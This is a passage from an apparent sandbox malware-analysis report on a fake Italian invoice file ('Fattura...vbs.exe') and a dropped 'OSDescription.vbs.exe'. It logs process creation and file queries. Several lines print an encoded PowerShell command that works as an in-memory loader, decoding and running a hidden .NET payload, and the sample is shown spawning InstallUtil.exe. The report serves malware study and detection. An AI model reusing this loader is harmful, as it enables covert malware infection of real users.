pAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs" Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAJump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "c:\users\user\appdata\roaming\osdescription.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwaJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "c:\users\user\appdata\roaming\osdescription.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwaJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
